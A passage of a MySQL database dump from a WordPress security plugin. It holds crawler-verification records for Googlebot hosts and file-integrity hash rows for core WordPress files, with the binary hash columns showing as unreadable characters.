',1600593219,'rate-limited-proxy-66-249-89-37.google.com'),('\0\0\0\0\0\0\0\0\0\06&Z','i| OoD!','verified',1600478502,''),('\0\0\0\0\0\0\0\0\0\06&Z','>b0oQ1','badPTR',1600478502,'ec2-54-167-38-90.compute-1.amazonaws.com'),('\0\0\0\0\0\0\0\0\0\0BY\r','>b0oQ1','verified',1604413120,'rate-limited-proxy-66-249-89-13.google.com'),('\0\0\0\0\0\0\0\0\0\0B\\','>b0oQ1','verified',1597479625,'rate-limited-proxy-66-249-92-210.google.com'),('\0\0\0\0\0\0\0\0\0\0BBF','>b0oQ1','verified',1604173875,'crawl-66-249-66-70.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1598601532,'crawl-66-249-66-198.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBY','>b0oQ1','verified',1604560392,'crawl-66-249-66-89.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B\\','>b0oQ1','verified',1597479623,'rate-limited-proxy-66-249-92-200.google.com'),('\0\0\0\0\0\0\0\0\0\0BY','>b0oQ1','verified',1604413110,'rate-limited-proxy-66-249-89-25.google.com'),('\0\0\0\0\0\0\0\0\0\09','i| OoD!','verified',1599951497,''),('\0\0\0\0\0\0\0\0\0\09','>b0oQ1','badPTR',1599951497,'178.57.18.1'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605176641,'crawl-66-249-64-180.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605069589,'crawl-66-249-64-178.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1603248055,'crawl-66-249-64-170.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BDV','>b0oQ1','verified',1599721402,'crawl-66-249-68-86.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605012328,'crawl-66-249-64-154.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604970407,'crawl-66-249-64-25.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605045346,'crawl-66-249-64-150.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@\r','>b0oQ1','verified',1604970415,'crawl-66-249-64-13.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604357470,'crawl-66-249-64-182.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605176642,'crawl-66-249-64-166.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605016092,'crawl-66-249-64-152.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB4','>b0oQ1','verified',1604569610,'crawl-66-249-66-52.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1599476710,'crawl-66-249-66-157.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B\\J','>b0oQ1','verified',1599344741,'rate-limited-proxy-66-249-92-74.google.com'),('\0\0\0\0\0\0\0\0\0\0B\\B','>b0oQ1','verified',1599344736,'rate-limited-proxy-66-249-92-66.google.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1600705387,'crawl-66-249-66-132.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1600679447,'crawl-66-249-66-130.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1603997760,'crawl-66-249-66-134.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1600683192,'crawl-66-249-66-138.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1603817007,'crawl-66-249-66-136.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB(','>b0oQ1','verified',1603696581,'crawl-66-249-66-40.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B\\','>b0oQ1','verified',1598728214,'rate-limited-proxy-66-249-92-208.google.com'),('\0\0\0\0\0\0\0\0\0\0B\\','>b0oQ1','verified',1598728189,'rate-limited-proxy-66-249-92-198.google.com'),('\0\0\0\0\0\0\0\0\0\0BBX','>b0oQ1','verified',1604601305,'crawl-66-249-66-88.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY(','>b0oQ1','verified',1598085223,'rate-limited-proxy-66-249-89-40.google.com'),('\0\0\0\0\0\0\0\0\0\0BF\n','>b0oQ1','verified',1603480210,'crawl-66-249-70-10.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1598293130,'crawl-66-249-64-29.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603473146,'crawl-66-249-70-14.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB2','>b0oQ1','verified',1604613127,'crawl-66-249-66-50.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB6','>b0oQ1','verified',1603851582,'crawl-66-249-66-54.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB&','>b0oQ1','verified',1604569612,'crawl-66-249-66-38.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBZ','>b0oQ1','verified',1604601300,'crawl-66-249-66-90.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1599233336,'crawl-66-249-66-200.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1598601363,'crawl-66-249-66-195.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BA','>b0oQ1','verified',1596607717,'crawl-66-249-65-174.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBB','>b0oQ1','verified',1604290060,'crawl-66-249-66-66.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB]','>b0oQ1','verified',1596342727,'crawl-66-249-66-93.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB^','>b0oQ1','verified',1596370973,'crawl-66-249-66-94.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BBD','>b0oQ1','verified',1604296617,'crawl-66-249-66-68.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1602783448,'crawl-66-249-64-128.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF0','>b0oQ1','verified',1596576409,'crawl-66-249-70-48.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF.','>b0oQ1','verified',1601997176,'crawl-66-249-70-46.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603480213,'crawl-66-249-70-8.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605230756,'crawl-66-249-64-24.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1602049470,'crawl-66-249-64-22.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603473144,'crawl-66-249-70-6.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603473139,'crawl-66-249-70-4.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604970413,'crawl-66-249-64-23.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0k-','>b0oQ1','badPTR',1597030716,'45.194.178.107.gae.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0k-','i| OoD!','verified',1597030717,''),('\0\0\0\0\0\0\0\0\0\0k0','i| OoD!','verified',1597030715,''),('\0\0\0\0\0\0\0\0\0\0k0','>b0oQ1','badPTR',1597030715,'48.194.178.107.gae.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0BA]','>b0oQ1','verified',1596641062,'crawl-66-249-65-93.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BA','>b0oQ1','verified',1596641167,'crawl-66-249-65-172.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BAZ','>b0oQ1','verified',1596635141,'crawl-66-249-65-90.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BA[','>b0oQ1','verified',1596635142,'crawl-66-249-65-91.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BA\\','>b0oQ1','verified',1596635139,'crawl-66-249-65-92.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BA','>b0oQ1','verified',1596607734,'crawl-66-249-65-176.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0OL','i| OoD!','verified',1593870280,''),('\0\0\0\0\0\0\0\0\0\0b\"(','>b0oQ1','badPTR',1593923092,'98.34.40.146'),('\0\0\0\0\0\0\0\0\0\0b\"(','i| OoD!','verified',1593923093,''),('\0\0\0\0\0\0\0\0\0\0BY,','>b0oQ1','verified',1596255822,'rate-limited-proxy-66-249-89-44.google.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1599188488,'crawl-66-249-66-208.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1604234531,'crawl-66-249-66-206.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1596351800,'crawl-66-249-66-204.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1599254035,'crawl-66-249-66-210.googlebot.com'),('\0\0\0\0\0\0\0\0\0\09','>b0oQ1','badPTR',1596280360,'185.57.29.186'),('\0\0\0\0\0\0\0\0\0\09','i| OoD!','verified',1596280360,''),('\0\0\0\0\0\0\0\0\0\0BB@','>b0oQ1','verified',1596342724,'crawl-66-249-66-64.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB\\','>b0oQ1','verified',1596342725,'crawl-66-249-66-92.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0OL','>b0oQ1','badPTR',1593870280,'swe-net-ip.as51430.net'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1595459246,'crawl-66-249-70-30.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY.','>b0oQ1','verified',1600593224,'rate-limited-proxy-66-249-89-46.google.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1602073783,'crawl-66-249-64-27.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY2','>b0oQ1','verified',1601215976,'rate-limited-proxy-66-249-89-50.google.com'),('\0\0\0\0\0\0\0\0\0\0e','>b0oQ1','badPTR',1593350884,'141.101.143.22'),('\0\0\0\0\0\0\0\0\0\0e','i| OoD!','verified',1593350884,''),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1605012329,'crawl-66-249-64-15.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603479777,'crawl-66-249-70-18.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1602116621,'crawl-66-249-70-22.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1596500990,'crawl-66-249-70-28.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1596500991,'crawl-66-249-70-24.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF\Z','>b0oQ1','verified',1596500988,'crawl-66-249-70-26.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@\Z','>b0oQ1','verified',1596710487,'crawl-66-249-64-26.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1604972565,'crawl-66-249-64-14.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1603501815,'crawl-66-249-64-28.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@','>b0oQ1','verified',1596723630,'crawl-66-249-64-16.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BY0','>b0oQ1','verified',1598085224,'rate-limited-proxy-66-249-89-48.google.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1598293132,'crawl-66-249-70-12.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BF','>b0oQ1','verified',1603471977,'crawl-66-249-70-16.googlebot.com');
/*!40000 ALTER TABLE `ar_wfCrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfFileChanges`
--

DROP TABLE IF EXISTS `ar_wfFileChanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfFileChanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfFileChanges`
--

LOCK TABLES `ar_wfFileChanges` WRITE;
/*!40000 ALTER TABLE `ar_wfFileChanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfFileChanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfFileMods`
--

DROP TABLE IF EXISTS `ar_wfFileMods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfFileMods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfFileMods`
--

LOCK TABLES `ar_wfFileMods` WRITE;
/*!40000 ALTER TABLE `ar_wfFileMods` DISABLE KEYS */;
INSERT INTO `ar_wfFileMods` VALUES ('\0+OW+','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]#NX,','Dz\n}_7x,9t:\'\r','',0,'?'),('[/9}`:wP','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lil+z9q9=\0{\r','.7h-Zs%|Cp)¯v','',0,'?'),('a?_ˢ6jX','readme.html',0,'\r{1yi<','\r{1yi<','ɗ$}b<o\'_=GՠQUe','',0,'?'),('Kgo#0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J,&','Zb?b~GU˻UJ~ȻL\'','',0,'?'),('-)75y8cWv','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':UV@#넔G',':o)ϑ8;=|TQq\0JH ','',0,'?'),('XH奥(:Z','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@u1\"0','\0鞈8Z?֣%D`L{E%\Z','',0,'?'),('!1b݅9*\\','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R#ttIrzXK','Vo梌>)xZEBO','',0,'?'),('KUg0MU/ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xo_Բ)\nr','(Z!.eTU92;ݏt5o^','',0,'?'),('@mOW','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wub7V4xV','4进MrB =+S\"{1E','',0,'?'),(']@\n>ĺYn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}dDTN\"F','Fԝq`멾r_Ȩ_\'I','',0,'?'),(',H(b_FO','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic?UA	!<','?0M(5*W}RV/Yd2','',0,'?'),('	Xt\\4vNI5j','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C8\n\\)V','*חUF\nl9Sk\\UZ%Ͽ^&\"','',0,'?'),('\"6\r+K{\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r.kP','Ib9SE8T2# \r\n','',0,'?'),('kM̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',[Oc','v_Uz(GJ0|G','',0,'?'),('*O-Lτ\r[u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mm/\\-nY0]','`U\'^h\";k#V=fz&➏X','',0,'?'),('Unɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d@Ξ\ZIB','Fw`raWYa&=h,,','',0,'?'),('A7\'C#wSs','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7j:>VT\\','* 9H6طr69;KW},','',0,'?'),('J!2\0','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7;1V s:l<','m7U{lTNx&G,','',0,'?'),('mn9F6','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xtUu6ct','\"X\'Ԏ05^mf c%ؿ+$','',0,'?'),('T]\\g4źuP;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\Z3vN','għ95\\}BMJ{zD','',0,'?'),('\"Z0\0ؿeԦp','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\'GfLg1','.,5FbR\'RQ^2I(^_&','',0,'?'),('E58yWsO','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ĸ4Â}?3',';6J\rdVm\ZI','',0,'?'),('`\n2','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3u/c\0TB-','4I\n7o^\ZڬVrt\nG','',0,'?'),('=f;Vdl\"','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')?sEH','yq}l[=	n(cLC','',0,'?'),('LߨϤ(R','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CAO^)','/y14~(6>B&F,S','',0,'?'),('~}{ >D}<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O+jwh3:N','}c/ٖ)DeKxOdH|5p[[n','',0,'?'),('Pa`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\'CZ^dMm:','->tkfM3GO33Dq','',0,'?'),('rW3᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a*	\rY~A','ZݳߥZr׮T`<m?T','',0,'?'),('F?C;$H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\'kR\ZJޤs','nrWm4Y	~jh|l@','',0,'?'),('ܡ9u_\\\n9\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/w	2ڢ','h_A4&uм?sA$Eq.)*','',0,'?'),('J|6}P,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MxWM\\0','q(\0y\Zt!.Xmq_','',0,'?'),('ue,\"\n	hg.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r:chW/5x#b','Yċ5:u9CIlc{x','',0,'?'),('=CѠ*TX4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|g<n12','W~ &xdYbyX)YJ1a','',0,'?'),('58d`S61K>ۮv','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Fw\"Y/','h0sYr&.mgոX\'Z\n{x\\','',0,'?'),('D8hFޛBViR','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','УA3\nk','U/ݗl\'B:8pۜN','',0,'?'),('FZYC83E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D`?Sir,B','M\'x0t_:	9of+','',0,'?'),('tm6ۗq.=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':T/) ؾ?d`','}sӛ9+Eb9F\0O','',0,'?'),('L>tN','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Iהg,)ZYM','\\kS뚑n wW	!*~v','',0,'?'),('juGCtO','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r)CGPChQa(','ksF?!ˈʪ]L=7,yjv+g','',0,'?'),('q?%rp07q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DIn\'BA','>H-Õ\Zi1zk)_V6(\r~:','',0,'?'),('ϴ 3P`#8^Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']/Aeg\\ ','s/V(E\\ΠH^Uz','',0,'?'),('eCDi!','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aߞa\0\"7ӣ','R3..ZGE)Q2%CԪHb','',0,'?'),('xIH.9YBO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9~8 z#C0^%a','\0{Zr~d0|B|]ׄj܌Ix>','',0,'?'),('jmEAXuw>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$Ye\'m2\"','!RB%!(~@','',0,'?'),('Dչ$Oa','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݏvʭWB','V}*2%^b\\W!>{m?','',0,'?'),('H\0ۙhC','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oט瞽','Uxx^֬J56T,B\\','',0,'?'),('[#ܧ\Z>]<','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rjr:b','hAmxL\'bb!|M','',0,'?'),('MTq&[?>칊\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q9+\"+','BmNhstNjAS4X\0$','',0,'?'),('q%ű m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~bRB1ı','N?OD#/\'B	ןŬIk','',0,'?'),('-f4]#\"ul','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','js\Z','$(ΐG;XK7;q[E','',0,'?'),('v{#lb\0}B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3#	KG?=\nF','>m5o9D.Wq\"uXx$&','',0,'?'),('9(FRj2n6]','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gu-٥3#','t{u\0+Qc\rCeAJ','',0,'?'),('KS+e׎A@','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HG#<^o','?=ҏE\ZMaXĺJ\"sk;3','',0,'?'),('L?@.~O','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ćGRN(i','8>|]صXL12@ˮi\n\'~6n','',0,'?'),('ᗏ3-4','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s[]>`<','S=EG:ǝ ޫ߲;X_','',0,'?'),(';bfȖ0x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L`	Ɏ',':eOFM<ozEǞZEB(','',0,'?'),('_\rJL#@B','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>[}\'K³IVR6',';d@e&7͟ߺ_ Y/','',0,'?'),('w=ŢO&F','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍|DW!E4','SoGp{\"FuS&','',0,'?'),('<(*A]O','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Ts9v+','YP\nᡇ\')S\';nr','',0,'?'),('{^WC','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':.[<sr~','\"\r:IL	\'Z;<1U!;','',0,'?'),('Ê5ff;,G!\'\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B&  {','	\0cJ\r]5\Zt,>','',0,'?'),('*Tu\r~m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tM\npt8ڞh','W	ʄ]UY1kMz&ۍ>','',0,'?'),('-Ǹ%w=','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z|[l|ٱf%h','ɮ1uZRH6I\r	ź􇖈B','',0,'?'),('j׻q.*;2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`]Cq','cD]PA͇nŉna21','',0,'?'),('2jL,W\rW$','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\\<.','K.oY#K\0RbՇ60%@)Y\nP*','',0,'?'),('y85æb','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_l3*\03','LVS)A*e\'G\n `i','',0,'?'),('-+emu\"x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wFw<3jVYZo','tQ\'Gڥ:;c.\"\0\\Wp\Z]','',0,'?'),('SCRCl','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Zz	h=','Q_n97L2$y:jSх','',0,'?'),('W2DG7V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','تGu`\nȧ%L,','<32kWiN.hi>h7m','',0,'?'),('XHov','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Am|ln)',')R5Z.$c[aZua','',0,'?'),('p96èR','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bq|\\\'R5','ckvИYT~SES2X4,','',0,'?'),('\rvN[B&SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'HMc8vUϹ6Y&U','l3*^/ǪC{q]_	(y|','',0,'?'),('Vk9۴sֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.O&@8ww-','0ZwL7Ū)C9\\+\"#ꆒ','',0,'?'),('pj֛`w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Չ{p1\nܷ/z','S%غ	]jt_MjE^Sѯ','',0,'?'),('?\n5H?','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qA\'V','r[U-6V1a4$jQщ','',0,'?'),('.նZg{=','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sh4#X\n<k^','y\r)LVӄi˂\"W?J','',0,'?'),('Oy k	b','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$\0h*BfajE','Yyr[rB<[\nti*(','',0,'?'),('HAf,$F-','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!_A@@+1`gJ','cG.-,Fɯժ2O8<m!','',0,'?'),('AlA~i^uØ','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*4^+G(ߢ','o\'晱}z\n','',0,'?'),('\0]pޑ	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PG(h@','a`kt%j+Qm\nhƪWh~','',0,'?'),('NHV